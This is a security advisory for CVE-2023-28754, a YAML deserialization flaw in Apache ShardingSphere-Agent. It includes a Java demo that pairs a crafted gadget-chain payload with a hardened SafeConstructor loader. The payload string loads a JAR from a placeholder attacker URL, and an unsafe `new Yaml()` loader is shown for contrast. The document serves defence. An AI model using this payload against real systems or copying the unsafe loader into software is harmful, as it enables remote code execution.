Apache · Shardingsphere-Agent · CVE-2023-28754
**Name of the Vulnerable Software and Affected Versions**
ShardingSphere-Agent versions through 5.3.2
**Description**
A deserialization of untrusted data issue in Apache ShardingSphere-Agent allows an attacker to execute arbitrary code by supplying a crafted YAML configuration file. Exploitation has two preconditions: the attacker must be able to modify the ShardingSphere-Agent YAML configuration file on the target machine, and the target machine must be able to reach the URL that hosts the attacker's JAR. The agent parses its configuration with SnakeYAML, which resolves explicit global tags (for example `!!java.net.URLClassLoader`) to Java classes and constructs them. The attacker uses this to have a `java.net.URLClassLoader` constructed that loads a JAR from a URL of their choice, and then to have a `javax.script.ScriptEngineManager` constructed with that ClassLoader, which loads and runs code from the JAR. When the ShardingSphere JVM process starts with the agent attached, the attacker's code therefore executes while the agent is deserializing its YAML configuration.
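The following is an added example, not code from ShardingSphere or from its 5.4.0 fix. It shows a YAML document shaped the way the description above lays out (explicit `!!` tags naming `javax.script.ScriptEngineManager`, `java.net.URLClassLoader` and `java.net.URL`), the unrestricted SnakeYAML call that would act on it, and a loader built on `SafeConstructor` that rejects such tags before any class is resolved or any URL is contacted. It assumes SnakeYAML 1.33 or later on the classpath (for the `SafeConstructor(LoaderOptions)` constructor); the behaviour of `new Yaml()` honouring arbitrary global tags is that of the 1.x line, since 2.x rejects global tags by default. The JAR URL uses the reserved `.invalid` domain and is a placeholder, not a real host.

```java
// Added example (not ShardingSphere's code): the SnakeYAML tag chain the advisory
// describes, beside a loader that refuses it. Assumes SnakeYAML 1.33+ (org.yaml:snakeyaml).
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.ConstructorException;
import org.yaml.snakeyaml.constructor.SafeConstructor;

import java.util.Map;

public class AgentYamlLoading {

    // Constructed sample config, shaped as the advisory describes: a ScriptEngineManager
    // built from a URLClassLoader whose URL the attacker controls. The host is a
    // placeholder (.invalid is a reserved TLD), not a real server. SnakeYAML resolves
    // each "!!" tag to a Java class and calls a matching constructor, so loading this
    // text with an unrestricted Yaml instance under SnakeYAML 1.x already runs code
    // from the JAR: ScriptEngineManager discovers ScriptEngineFactory services on the
    // supplied ClassLoader and instantiates them.
    static final String MALICIOUS_AGENT_CONFIG = String.join("\n",
            "applicationName: demo",
            "plugins:",
            "  gadget: !!javax.script.ScriptEngineManager [",
            "    !!java.net.URLClassLoader [[",
            "      !!java.net.URL [\"http://attacker.invalid/evil.jar\"]",
            "    ]]",
            "  ]");

    // Vulnerable pattern: the default constructor honours any global tag (SnakeYAML 1.x).
    // Kept only for contrast; main() never calls it.
    static Map<String, Object> loadUnsafe(String yamlText) {
        return new Yaml().load(yamlText);
    }

    // Hardened pattern: SafeConstructor only knows the standard YAML types (maps,
    // sequences, scalars) and throws ConstructorException on any other tag. The
    // exception is raised while building the node graph, before any class named in
    // the file is loaded and before any network access could happen.
    static Map<String, Object> loadSafe(String yamlText) {
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        return yaml.load(yamlText);
    }

    public static void main(String[] args) {
        // A benign agent-style config (constructed for the demo) still loads normally.
        String benign = "applicationName: demo\nplugins:\n  metrics:\n    host: localhost\n";
        System.out.println("benign config via SafeConstructor: " + loadSafe(benign));

        // The tagged payload is rejected without touching the URL.
        try {
            loadSafe(MALICIOUS_AGENT_CONFIG);
            System.out.println("UNEXPECTED: payload was accepted");
        } catch (ConstructorException e) {
            System.out.println("payload rejected: " + e.getMessage());
        }
    }
}
```

Compile and run with the SnakeYAML JAR on the classpath (`javac -cp snakeyaml.jar AgentYamlLoading.java && java -cp snakeyaml.jar:. AgentYamlLoading`). Because the safe loader fails on the tag itself, it does not depend on outbound filtering to be effective; blocking the JAR URL, as suggested under Recommendations, is a second layer that only matters if an unrestricted loader is still in use.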
**Recommendations**
For ShardingSphere-Agent versions through 5.3.2, upgrade to Apache ShardingSphere 5.4.0, which fixes the vulnerability. As a temporary workaround, restrict write access to the ShardingSphere-Agent YAML configuration file so that only the account that administers the agent can modify it. Additionally, restrict outbound network access from the target machine so that the JVM cannot fetch JARs from attacker-controlled URLs; this limits the impact of a tampered configuration file but does not remove the underlying deserialization flaw.